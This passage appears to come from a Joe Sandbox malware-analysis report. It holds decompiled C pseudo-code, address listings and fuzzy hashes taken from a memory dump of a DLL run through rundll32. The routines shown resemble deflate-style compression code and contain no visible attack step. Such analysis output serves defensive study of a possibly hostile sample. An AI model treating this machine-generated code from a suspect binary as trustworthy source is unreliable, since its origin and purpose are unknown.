                                                                                                                                                                                                                											_t201 = _t223 + 0x16b9; // 0xfff4d88
                                                                                                                                                                                                                											 *((char*)( *_t199 +  *_t200)) =  *_t201;
                                                                                                                                                                                                                											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                                                                                                                                                                                                											 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff7;
                                                                                                                                                                                                                											 *(_t223 + 0x16b8) = _t390 >> 0x10;
                                                                                                                                                                                                                										}
                                                                                                                                                                                                                										goto L35;
                                                                                                                                                                                                                									}
                                                                                                                                                                                                                									_t123 = _t223 + 0xac0; // 0x80000002
                                                                                                                                                                                                                									_t343 =  *_t123 & 0x0000ffff;
                                                                                                                                                                                                                									_t124 = _t223 + 0xac2; // 0x850f8000
                                                                                                                                                                                                                									_t241 =  *_t124 & 0x0000ffff;
                                                                                                                                                                                                                									_v24 = _t343;
                                                                                                                                                                                                                									_t126 = _t223 + 0x16b8; // 0xff4d88c8
                                                                                                                                                                                                                									_t346 = (_t343 << _t400 |  *_t126) & 0x0000ffff;
                                                                                                                                                                                                                									_v28 = _t346;
                                                                                                                                                                                                                									if(_t400 > 0x10 - _t241) {
                                                                                                                                                                                                                										_t128 = _t223 + 0x14; // 0xc703f045
                                                                                                                                                                                                                										 *(_t223 + 0x16b8) = _t346;
                                                                                                                                                                                                                										_t130 = _t223 + 8; // 0x8d000040
                                                                                                                                                                                                                										 *((char*)( *_t130 +  *_t128)) = _v28;
                                                                                                                                                                                                                										_t223 = _a4;
                                                                                                                                                                                                                										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                                                                                                                                                                                                										_t136 = _t223 + 0x14; // 0xc703f045
                                                                                                                                                                                                                										_t137 = _t223 + 8; // 0x8d000040
                                                                                                                                                                                                                										_t138 = _t223 + 0x16b9; // 0xfff4d88
                                                                                                                                                                                                                										 *((char*)( *_t136 +  *_t137)) =  *_t138;
                                                                                                                                                                                                                										_t142 = _t223 + 0x16bc; // 0x8ac9b60f
                                                                                                                                                                                                                										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                                                                                                                                                                                                										_t346 = _v24 >> 0x10;
                                                                                                                                                                                                                										_t400 =  *_t142 + 0xfffffff0;
                                                                                                                                                                                                                									}
                                                                                                                                                                                                                									_t403 = _t400 + _t241;
                                                                                                                                                                                                                									_t347 = _t346 & 0x0000ffff;
                                                                                                                                                                                                                									 *(_t223 + 0x16bc) = _t403;
                                                                                                                                                                                                                									 *(_t223 + 0x16b8) = _t347;
                                                                                                                                                                                                                									_t348 = _t347 & 0x0000ffff;
                                                                                                                                                                                                                									if(_t403 <= 0xd) {
                                                                                                                                                                                                                										_t163 = _t403 + 3; // 0x8ac9b612
                                                                                                                                                                                                                										_t275 = _t163;
                                                                                                                                                                                                                										L28:
                                                                                                                                                                                                                										 *(_t223 + 0x16bc) = _t275;
                                                                                                                                                                                                                										_t165 = _t388 - 3; // -2
                                                                                                                                                                                                                										_t166 = _t223 + 0x16b8; // 0xff4d88c8
                                                                                                                                                                                                                										 *(_t223 + 0x16b8) = (_t165 << _t403 |  *_t166 & 0x0000ffff) & 0x0000ffff;
                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                										_t392 = _t388 + 0xfffffffd;
                                                                                                                                                                                                                										_t147 = _t223 + 0x14; // 0xc703f045
                                                                                                                                                                                                                										_t244 = _t392 << _t403 | _t348;
                                                                                                                                                                                                                										_t148 = _t223 + 8; // 0x8d000040
                                                                                                                                                                                                                										 *(_t223 + 0x16b8) = _t244;
                                                                                                                                                                                                                										 *( *_t148 +  *_t147) = _t244;
                                                                                                                                                                                                                										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                                                                                                                                                                                                										_t153 = _t223 + 0x14; // 0xc703f045
                                                                                                                                                                                                                										_t154 = _t223 + 8; // 0x8d000040
                                                                                                                                                                                                                										_t155 = _t223 + 0x16b9; // 0xfff4d88
                                                                                                                                                                                                                										 *((char*)( *_t153 +  *_t154)) =  *_t155;
                                                                                                                                                                                                                										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                                                                                                                                                                                                										 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff3;
                                                                                                                                                                                                                										 *(_t223 + 0x16b8) = _t392 >> 0x00000010 & 0x0000ffff;
                                                                                                                                                                                                                									}
                                                                                                                                                                                                                									goto L35;
                                                                                                                                                                                                                								}
                                                                                                                                                                                                                								_t289 = _a12;
                                                                                                                                                                                                                								if(_t289 != _t398) {
                                                                                                                                                                                                                									_t53 = _t289 * 4; // 0x6af0458d
                                                                                                                                                                                                                									_t396 =  *(_t223 + _t53 + 0xa7e) & 0x0000ffff;
                                                                                                                                                                                                                									_t56 = _t235 * 4; // 0x458d2374
                                                                                                                                                                                                                									_t370 =  *(_t223 + _t56 + 0xa7c) & 0x0000ffff;
                                                                                                                                                                                                                									_t58 = _t223 + 0x16bc; // 0x8ac9b60f
                                                                                                                                                                                                                									_t407 =  *_t58;
                                                                                                                                                                                                                									_v28 = _t370;
                                                                                                                                                                                                                									_t60 = _t223 + 0x16b8; // 0xff4d88c8
                                                                                                                                                                                                                									_t249 = (_t370 << _t407 |  *_t60) & 0x0000ffff;
                                                                                                                                                                                                                									if(_t407 <= 0x10 - _t396) {
                                                                                                                                                                                                                										_t373 = _t249;
                                                                                                                                                                                                                										_t308 = _t407 + _t396;
                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                										_t61 = _t223 + 0x14; // 0xc703f045
                                                                                                                                                                                                                										_t62 = _t223 + 8; // 0x8d000040
                                                                                                                                                                                                                										 *(_t223 + 0x16b8) = _t249;
                                                                                                                                                                                                                										 *( *_t62 +  *_t61) = _t249;
                                                                                                                                                                                                                										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                                                                                                                                                                                                										_t67 = _t223 + 0x14; // 0xc703f045
                                                                                                                                                                                                                										_t68 = _t223 + 8; // 0x8d000040
                                                                                                                                                                                                                										_t69 = _t223 + 0x16b9; // 0xfff4d88
                                                                                                                                                                                                                										 *((char*)( *_t67 +  *_t68)) =  *_t69;
                                                                                                                                                                                                                										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                                                                                                                                                                                                										_t75 = _t223 + 0x16bc; // 0x8ac9b60f
                                                                                                                                                                                                                										_t373 = _v28 >> 0x00000010 & 0x0000ffff;
                                                                                                                                                                                                                										_t308 =  *_t75 + 0xfffffff0 + _t396;
                                                                                                                                                                                                                									}
                                                                                                                                                                                                                									_t388 = _v24;
                                                                                                                                                                                                                									 *(_t223 + 0x16bc) = _t308;
                                                                                                                                                                                                                									 *(_t223 + 0x16b8) = _t373;
                                                                                                                                                                                                                								}
                                                                                                                                                                                                                								_t80 = _t223 + 0xabc; // 0xf981f055
                                                                                                                                                                                                                								_t358 =  *_t80 & 0x0000ffff;
                                                                                                                                                                                                                								_t81 = _t223 + 0x16bc; // 0x8ac9b60f
                                                                                                                                                                                                                								_t402 =  *_t81;
                                                                                                                                                                                                                								_t82 = _t223 + 0xabe; // 0x2f981
                                                                                                                                                                                                                								_t245 =  *_t82 & 0x0000ffff;
                                                                                                                                                                                                                								_v24 = _t358;
                                                                                                                                                                                                                								_t84 = _t223 + 0x16b8; // 0xff4d88c8
                                                                                                                                                                                                                								_t361 = (_t358 << _t402 |  *_t84) & 0x0000ffff;
                                                                                                                                                                                                                								_v28 = _t361;
                                                                                                                                                                                                                								if(_t402 > 0x10 - _t245) {
                                                                                                                                                                                                                									_t86 = _t223 + 0x14; // 0xc703f045
                                                                                                                                                                                                                									 *(_t223 + 0x16b8) = _t361;
                                                                                                                                                                                                                									_t88 = _t223 + 8; // 0x8d000040
                                                                                                                                                                                                                									 *((char*)( *_t88 +  *_t86)) = _v28;
                                                                                                                                                                                                                									_t223 = _a4;
                                                                                                                                                                                                                									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                                                                                                                                                                                                									_t94 = _t223 + 0x14; // 0xc703f045
                                                                                                                                                                                                                									_t95 = _t223 + 8; // 0x8d000040
                                                                                                                                                                                                                									_t96 = _t223 + 0x16b9; // 0xfff4d88
                                                                                                                                                                                                                									 *((char*)( *_t94 +  *_t95)) =  *_t96;
                                                                                                                                                                                                                									_t100 = _t223 + 0x16bc; // 0x8ac9b60f
                                                                                                                                                                                                                									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                                                                                                                                                                                                									_t361 = _v24 >> 0x10;
                                                                                                                                                                                                                									_t402 =  *_t100 + 0xfffffff0;
                                                                                                                                                                                                                								}
                                                                                                                                                                                                                								_t403 = _t402 + _t245;
                                                                                                                                                                                                                								_t362 = _t361 & 0x0000ffff;
                                                                                                                                                                                                                								 *(_t223 + 0x16bc) = _t403;
                                                                                                                                                                                                                								 *(_t223 + 0x16b8) = _t362;
                                                                                                                                                                                                                								_t363 = _t362 & 0x0000ffff;
                                                                                                                                                                                                                								if(_t403 <= 0xe) {
                                                                                                                                                                                                                									_t121 = _t403 + 2; // 0x8ac9b611
                                                                                                                                                                                                                									_t275 = _t121;
                                                                                                                                                                                                                									goto L28;
                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                									_t394 = _t388 + 0xfffffffd;
                                                                                                                                                                                                                									_t105 = _t223 + 0x14; // 0xc703f045
                                                                                                                                                                                                                									_t248 = _t394 << _t403 | _t363;
                                                                                                                                                                                                                									_t106 = _t223 + 8; // 0x8d000040
                                                                                                                                                                                                                									 *(_t223 + 0x16b8) = _t248;
                                                                                                                                                                                                                									 *( *_t106 +  *_t105) = _t248;
                                                                                                                                                                                                                									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                                                                                                                                                                                                									_t111 = _t223 + 0x14; // 0xc703f045
                                                                                                                                                                                                                									_t112 = _t223 + 8; // 0x8d000040
                                                                                                                                                                                                                									_t113 = _t223 + 0x16b9; // 0xfff4d88
                                                                                                                                                                                                                									 *((char*)( *_t111 +  *_t112)) =  *_t113;
                                                                                                                                                                                                                									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                                                                                                                                                                                                									 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff2;
                                                                                                                                                                                                                									 *(_t223 + 0x16b8) = _t394 >> 0x00000010 & 0x0000ffff;
                                                                                                                                                                                                                									goto L35;
                                                                                                                                                                                                                								}
                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                								_t316 = _t223 + (_t235 + 0x29f) * 4;
                                                                                                                                                                                                                								_v28 = _t316;
                                                                                                                                                                                                                								do {
                                                                                                                                                                                                                									_t378 = _a12;
                                                                                                                                                                                                                									_t22 = _t223 + 0x16bc; // 0x8ac9b60f
                                                                                                                                                                                                                									_t409 =  *_t22;
                                                                                                                                                                                                                									_t24 = _t378 * 4; // 0x6af0458d
                                                                                                                                                                                                                									_t250 =  *(_t223 + _t24 + 0xa7e) & 0x0000ffff;
                                                                                                                                                                                                                									_t379 =  *_t316 & 0x0000ffff;
                                                                                                                                                                                                                									_v24 = _t379;
                                                                                                                                                                                                                									_t27 = _t223 + 0x16b8; // 0xff4d88c8
                                                                                                                                                                                                                									_t382 = (_t379 << _t409 |  *_t27) & 0x0000ffff;
                                                                                                                                                                                                                									_v20 = _t382;
                                                                                                                                                                                                                									if(_t409 <= 0x10 - _t250) {
                                                                                                                                                                                                                										_t321 = _t409 + _t250;
                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                										_t29 = _t223 + 0x14; // 0xc703f045
                                                                                                                                                                                                                										 *(_t223 + 0x16b8) = _t382;
                                                                                                                                                                                                                										_t31 = _t223 + 8; // 0x8d000040
                                                                                                                                                                                                                										 *((char*)( *_t31 +  *_t29)) = _v20;
                                                                                                                                                                                                                										_t223 = _a4;
                                                                                                                                                                                                                										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                                                                                                                                                                                                										_t37 = _t223 + 0x14; // 0xc703f045
                                                                                                                                                                                                                										_t38 = _t223 + 8; // 0x8d000040
                                                                                                                                                                                                                										_t39 = _t223 + 0x16b9; // 0xfff4d88
                                                                                                                                                                                                                										 *((char*)( *_t37 +  *_t38)) =  *_t39;
                                                                                                                                                                                                                										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                                                                                                                                                                                                										_t382 = _v24 >> 0x10;
                                                                                                                                                                                                                										_t45 = _t223 + 0x16bc; // 0x8ac9b60f
                                                                                                                                                                                                                										_t321 =  *_t45 + 0xfffffff0 + _t250;
                                                                                                                                                                                                                									}
                                                                                                                                                                                                                									 *(_t223 + 0x16bc) = _t321;
                                                                                                                                                                                                                									_t316 = _v28;
                                                                                                                                                                                                                									 *(_t223 + 0x16b8) = _t382 & 0x0000ffff;
                                                                                                                                                                                                                									_t388 = _t388 - 1;
                                                                                                                                                                                                                								} while (_t388 != 0);
                                                                                                                                                                                                                								L35:
                                                                                                                                                                                                                								_t235 = _v8;
                                                                                                                                                                                                                								_t388 = 0;
                                                                                                                                                                                                                								_t398 = _a12;
                                                                                                                                                                                                                								if(_t235 != 0) {
                                                                                                                                                                                                                									if(_a8 != _t235) {
                                                                                                                                                                                                                										_t329 = 7;
                                                                                                                                                                                                                										_t217 = _t329 - 3; // 0x4
                                                                                                                                                                                                                										_t254 = _t217;
                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                										_t329 = 6;
                                                                                                                                                                                                                										_t216 = _t329 - 3; // 0x3
                                                                                                                                                                                                                										_t254 = _t216;
                                                                                                                                                                                                                									}
                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                									_t329 = 0x8a;
                                                                                                                                                                                                                									_t214 = _t388 + 3; // 0x3
                                                                                                                                                                                                                									_t254 = _t214;
                                                                                                                                                                                                                								}
                                                                                                                                                                                                                								goto L41;
                                                                                                                                                                                                                							}
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                						_t223 = _a4;
                                                                                                                                                                                                                						if(_t235 == _v8) {
                                                                                                                                                                                                                							_t235 = _v8;
                                                                                                                                                                                                                							goto L41;
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                						goto L4;
                                                                                                                                                                                                                						L41:
                                                                                                                                                                                                                						_v12 =  &(_v12[2]);
                                                                                                                                                                                                                						_t221 =  &_v16;
                                                                                                                                                                                                                						 *_t221 = _v16 - 1;
                                                                                                                                                                                                                					} while ( *_t221 != 0);
                                                                                                                                                                                                                					goto L42;
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                			}
























































                                                                                                                                                                                                                0x100194d3
                                                                                                                                                                                                                0x100194da
                                                                                                                                                                                                                0x100194de
                                                                                                                                                                                                                0x100194e0
                                                                                                                                                                                                                0x100194e2
                                                                                                                                                                                                                0x100194e8
                                                                                                                                                                                                                0x100199d5
                                                                                                                                                                                                                0x100199db
                                                                                                                                                                                                                0x100194ee
                                                                                                                                                                                                                0x100194fa
                                                                                                                                                                                                                0x10019507
                                                                                                                                                                                                                0x1001950a
                                                                                                                                                                                                                0x10019511
                                                                                                                                                                                                                0x10019514
                                                                                                                                                                                                                0x10019517
                                                                                                                                                                                                                0x1001951a
                                                                                                                                                                                                                0x1001951b
                                                                                                                                                                                                                0x1001951e
                                                                                                                                                                                                                0x10019524
                                                                                                                                                                                                                0x10019527
                                                                                                                                                                                                                0x1001952c
                                                                                                                                                                                                                0x1001953c
                                                                                                                                                                                                                0x1001953e
                                                                                                                                                                                                                0x100195f4
                                                                                                                                                                                                                0x10019783
                                                                                                                                                                                                                0x10019783
                                                                                                                                                                                                                0x1001978c
                                                                                                                                                                                                                0x1001989f
                                                                                                                                                                                                                0x1001989f
                                                                                                                                                                                                                0x100198a6
                                                                                                                                                                                                                0x100198a6
                                                                                                                                                                                                                0x100198af
                                                                                                                                                                                                                0x100198bc
                                                                                                                                                                                                                0x100198c5
                                                                                                                                                                                                                0x100198c8
                                                                                                                                                                                                                0x100198cd
                                                                                                                                                                                                                0x10019915
                                                                                                                                                                                                                0x100198cf
                                                                                                                                                                                                                0x100198cf
                                                                                                                                                                                                                0x100198d2
                                                                                                                                                                                                                0x100198d9
                                                                                                                                                                                                                0x100198df
                                                                                                                                                                                                                0x100198e2
                                                                                                                                                                                                                0x100198e5
                                                                                                                                                                                                                0x100198e8
                                                                                                                                                                                                                0x100198eb
                                                                                                                                                                                                                0x100198ee
                                                                                                                                                                                                                0x100198f4
                                                                                                                                                                                                                0x10019902
                                                                                                                                                                                                                0x10019905
                                                                                                                                                                                                                0x10019908
                                                                                                                                                                                                                0x10019911
                                                                                                                                                                                                                0x10019911
                                                                                                                                                                                                                0x10019918
                                                                                                                                                                                                                0x1001991b
                                                                                                                                                                                                                0x10019921
                                                                                                                                                                                                                0x10019928
                                                                                                                                                                                                                0x1001992e
                                                                                                                                                                                                                0x1001997c
                                                                                                                                                                                                                0x10019988
                                                                                                                                                                                                                0x1001998f
                                                                                                                                                                                                                0x10019930
                                                                                                                                                                                                                0x10019930
                                                                                                                                                                                                                0x10019933
                                                                                                                                                                                                                0x1001993c
                                                                                                                                                                                                                0x1001993f
                                                                                                                                                                                                                0x10019942
                                                                                                                                                                                                                0x10019949
                                                                                                                                                                                                                0x1001994c
                                                                                                                                                                                                                0x1001994f
                                                                                                                                                                                                                0x10019952
                                                                                                                                                                                                                0x10019955
                                                                                                                                                                                                                0x1001995b
                                                                                                                                                                                                                0x10019966
                                                                                                                                                                                                                0x1001996c
                                                                                                                                                                                                                0x10019973
                                                                                                                                                                                                                0x10019973
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1001992e
                                                                                                                                                                                                                0x10019792
                                                                                                                                                                                                                0x10019792
                                                                                                                                                                                                                0x10019799
                                                                                                                                                                                                                0x10019799
                                                                                                                                                                                                                0x100197a2
                                                                                                                                                                                                                0x100197af
                                                                                                                                                                                                                0x100197b8
                                                                                                                                                                                                                0x100197bb
                                                                                                                                                                                                                0x100197c0
                                                                                                                                                                                                                0x100197c2
                                                                                                                                                                                                                0x100197c5
                                                                                                                                                                                                                0x100197cc
                                                                                                                                                                                                                0x100197d2
                                                                                                                                                                                                                0x100197d5
                                                                                                                                                                                                                0x100197d8
                                                                                                                                                                                                                0x100197db
                                                                                                                                                                                                                0x100197de
                                                                                                                                                                                                                0x100197e1
                                                                                                                                                                                                                0x100197e7
                                                                                                                                                                                                                0x100197f5
                                                                                                                                                                                                                0x100197fb
                                                                                                                                                                                                                0x100197fe
                                                                                                                                                                                                                0x10019801
                                                                                                                                                                                                                0x10019801
                                                                                                                                                                                                                0x10019804
                                                                                                                                                                                                                0x10019806
                                                                                                                                                                                                                0x10019809
                                                                                                                                                                                                                0x1001980f
                                                                                                                                                                                                                0x10019816
                                                                                                                                                                                                                0x1001981c
                                                                                                                                                                                                                0x10019875
                                                                                                                                                                                                                0x10019875
                                                                                                                                                                                                                0x10019878
                                                                                                                                                                                                                0x10019878
                                                                                                                                                                                                                0x1001987e
                                                                                                                                                                                                                0x10019886
                                                                                                                                                                                                                0x10019893
                                                                                                                                                                                                                0x1001981e
                                                                                                                                                                                                                0x1001981e
                                                                                                                                                                                                                0x10019829
                                                                                                                                                                                                                0x1001982c
                                                                                                                                                                                                                0x1001982f
                                                                                                                                                                                                                0x10019832
                                                                                                                                                                                                                0x10019839
                                                                                                                                                                                                                0x1001983c
                                                                                                                                                                                                                0x1001983f
                                                                                                                                                                                                                0x10019842
                                                                                                                                                                                                                0x10019845
                                                                                                                                                                                                                0x1001984b
                                                                                                                                                                                                                0x10019857
                                                                                                                                                                                                                0x1001985c
                                                                                                                                                                                                                0x10019869
                                                                                                                                                                                                                0x10019869
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1001981c
                                                                                                                                                                                                                0x100195fa
                                                                                                                                                                                                                0x100195ff
                                                                                                                                                                                                                0x10019605
                                                                                                                                                                                                                0x10019605
                                                                                                                                                                                                                0x1001960d
                                                                                                                                                                                                                0x1001960d
                                                                                                                                                                                                                0x10019615
                                                                                                                                                                                                                0x10019615
                                                                                                                                                                                                                0x1001961d
                                                                                                                                                                                                                0x1001962a
                                                                                                                                                                                                                0x10019633
                                                                                                                                                                                                                0x10019638
                                                                                                                                                                                                                0x1001967d
                                                                                                                                                                                                                0x1001967f
                                                                                                                                                                                                                0x1001963a
                                                                                                                                                                                                                0x1001963a
                                                                                                                                                                                                                0x1001963d
                                                                                                                                                                                                                0x10019640
                                                                                                                                                                                                                0x10019647
                                                                                                                                                                                                                0x1001964a
                                                                                                                                                                                                                0x1001964d
                                                                                                                                                                                                                0x10019650
                                                                                                                                                                                                                0x10019653
                                                                                                                                                                                                                0x10019659
                                                                                                                                                                                                                0x10019667
                                                                                                                                                                                                                0x1001966d
                                                                                                                                                                                                                0x10019676
                                                                                                                                                                                                                0x10019679
                                                                                                                                                                                                                0x10019679
                                                                                                                                                                                                                0x10019682
                                                                                                                                                                                                                0x10019685
                                                                                                                                                                                                                0x1001968b
                                                                                                                                                                                                                0x1001968b
                                                                                                                                                                                                                0x10019692
                                                                                                                                                                                                                0x10019692
                                                                                                                                                                                                                0x10019699
                                                                                                                                                                                                                0x10019699
                                                                                                                                                                                                                0x100196a1
                                                                                                                                                                                                                0x100196a1
                                                                                                                                                                                                                0x100196a8
                                                                                                                                                                                                                0x100196b5
                                                                                                                                                                                                                0x100196be
                                                                                                                                                                                                                0x100196c1
                                                                                                                                                                                                                0x100196c6
                                                                                                                                                                                                                0x100196c8
                                                                                                                                                                                                                0x100196cb
                                                                                                                                                                                                                0x100196d2
                                                                                                                                                                                                                0x100196d8
                                                                                                                                                                                                                0x100196db
                                                                                                                                                                                                                0x100196de
                                                                                                                                                                                                                0x100196e1
                                                                                                                                                                                                                0x100196e4
                                                                                                                                                                                                                0x100196e7
                                                                                                                                                                                                                0x100196ed
                                                                                                                                                                                                                0x100196fb
                                                                                                                                                                                                                0x10019701
                                                                                                                                                                                                                0x10019704
                                                                                                                                                                                                                0x10019707
                                                                                                                                                                                                                0x10019707
                                                                                                                                                                                                                0x1001970a
                                                                                                                                                                                                                0x1001970c
                                                                                                                                                                                                                0x1001970f
                                                                                                                                                                                                                0x10019715
                                                                                                                                                                                                                0x1001971c
                                                                                                                                                                                                                0x10019722
                                                                                                                                                                                                                0x1001977b
                                                                                                                                                                                                                0x1001977b
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10019724
                                                                                                                                                                                                                0x10019724
                                                                                                                                                                                                                0x1001972f
                                                                                                                                                                                                                0x10019732
                                                                                                                                                                                                                0x10019735
                                                                                                                                                                                                                0x10019738
                                                                                                                                                                                                                0x1001973f
                                                                                                                                                                                                                0x10019742
                                                                                                                                                                                                                0x10019745
                                                                                                                                                                                                                0x10019748
                                                                                                                                                                                                                0x1001974b
                                                                                                                                                                                                                0x10019751
                                                                                                                                                                                                                0x1001975d
                                                                                                                                                                                                                0x10019762
                                                                                                                                                                                                                0x1001976f
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1001976f
                                                                                                                                                                                                                0x10019544
                                                                                                                                                                                                                0x1001954a
                                                                                                                                                                                                                0x1001954d
                                                                                                                                                                                                                0x10019550
                                                                                                                                                                                                                0x10019550
                                                                                                                                                                                                                0x10019553
                                                                                                                                                                                                                0x10019553
                                                                                                                                                                                                                0x10019559
                                                                                                                                                                                                                0x10019559
                                                                                                                                                                                                                0x10019561
                                                                                                                                                                                                                0x10019566
                                                                                                                                                                                                                0x10019573
                                                                                                                                                                                                                0x1001957c
                                                                                                                                                                                                                0x1001957f
                                                                                                                                                                                                                0x10019584
                                                                                                                                                                                                                0x100195cc
                                                                                                                                                                                                                0x10019586
                                                                                                                                                                                                                0x10019586
                                                                                                                                                                                                                0x10019589
                                                                                                                                                                                                                0x10019590
                                                                                                                                                                                                                0x10019596
                                                                                                                                                                                                                0x10019599
                                                                                                                                                                                                                0x1001959c
                                                                                                                                                                                                                0x1001959f
                                                                                                                                                                                                                0x100195a2
                                                                                                                                                                                                                0x100195a5
                                                                                                                                                                                                                0x100195ab
                                                                                                                                                                                                                0x100195b9
                                                                                                                                                                                                                0x100195bc
                                                                                                                                                                                                                0x100195bf
                                                                                                                                                                                                                0x100195c8
                                                                                                                                                                                                                0x100195c8
                                                                                                                                                                                                                0x100195d2
                                                                                                                                                                                                                0x100195d8
                                                                                                                                                                                                                0x100195db
                                                                                                                                                                                                                0x100195e2
                                                                                                                                                                                                                0x100195e2
                                                                                                                                                                                                                0x10019995
                                                                                                                                                                                                                0x10019995
                                                                                                                                                                                                                0x10019998
                                                                                                                                                                                                                0x1001999a
                                                                                                                                                                                                                0x1001999f
                                                                                                                                                                                                                0x100199ae
                                                                                                                                                                                                                0x100199ba
                                                                                                                                                                                                                0x100199bf
                                                                                                                                                                                                                0x100199bf
                                                                                                                                                                                                                0x100199b0
                                                                                                                                                                                                                0x100199b0
                                                                                                                                                                                                                0x100199b5
                                                                                                                                                                                                                0x100199b5
                                                                                                                                                                                                                0x100199b5
                                                                                                                                                                                                                0x100199a1
                                                                                                                                                                                                                0x100199a1
                                                                                                                                                                                                                0x100199a6
                                                                                                                                                                                                                0x100199a6
                                                                                                                                                                                                                0x100199a6
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1001999f
                                                                                                                                                                                                                0x1001953e
                                                                                                                                                                                                                0x10019533
                                                                                                                                                                                                                0x10019536
                                                                                                                                                                                                                0x100199c4
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x100199c4
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x100199c7
                                                                                                                                                                                                                0x100199c7
                                                                                                                                                                                                                0x100199cb
                                                                                                                                                                                                                0x100199cb
                                                                                                                                                                                                                0x100199cb
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10019514

                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000002.5727312172.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727281860.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727452661.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727497896.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727528413.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 0050a3338128a3e29d0738b8ec7b1954f4e7d535beab72997c1b6becb188d890
                                                                                                                                                                                                                • Instruction ID: 214d7a17fbbeb721b2fc272fa8e13e03def7007dcfd9fc1c1e1a72706350d461
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0050a3338128a3e29d0738b8ec7b1954f4e7d535beab72997c1b6becb188d890
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7AF14C755092518FC709CF19C4948FA7BF1EFA9310B1E82FDD8899B3A6D731A980CB91
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                C-Code - Quality: 97%
                                                                                                                                                                                                                			E10003EEA(void* __fp0) {
                                                                                                                                                                                                                				char _v5;
                                                                                                                                                                                                                				char _v12;
                                                                                                                                                                                                                				char _v16;
                                                                                                                                                                                                                				char _v20;
                                                                                                                                                                                                                				char _v24;
                                                                                                                                                                                                                				intOrPtr* _t122;
                                                                                                                                                                                                                				char _t127;
                                                                                                                                                                                                                				char _t151;
                                                                                                                                                                                                                				intOrPtr _t165;
                                                                                                                                                                                                                				intOrPtr _t166;
                                                                                                                                                                                                                				intOrPtr _t167;
                                                                                                                                                                                                                				intOrPtr _t168;
                                                                                                                                                                                                                				intOrPtr _t169;
                                                                                                                                                                                                                				intOrPtr _t170;
                                                                                                                                                                                                                				intOrPtr _t175;
                                                                                                                                                                                                                				void* _t178;
                                                                                                                                                                                                                				void* _t179;
                                                                                                                                                                                                                				void* _t180;
                                                                                                                                                                                                                				void* _t181;
                                                                                                                                                                                                                				char* _t186;
                                                                                                                                                                                                                				void* _t202;
                                                                                                                                                                                                                				void* _t203;
                                                                                                                                                                                                                				signed int _t208;
                                                                                                                                                                                                                				char _t209;
                                                                                                                                                                                                                				void* _t210;
                                                                                                                                                                                                                				void* _t211;
                                                                                                                                                                                                                				void* _t212;
                                                                                                                                                                                                                				void* _t213;
                                                                                                                                                                                                                				char _t214;
                                                                                                                                                                                                                				char _t215;
                                                                                                                                                                                                                				intOrPtr* _t216;
                                                                                                                                                                                                                				void* _t217;
                                                                                                                                                                                                                
                                                                                                                                                                                                                				_t260 = __fp0;
                                                                                                                                                                                                                				_t122 = E10009525(0x20);
                                                                                                                                                                                                                				_t216 = _t122;
                                                                                                                                                                                                                				if(_t216 == 0) {
                                                                                                                                                                                                                					return _t122;
                                                                                                                                                                                                                				}
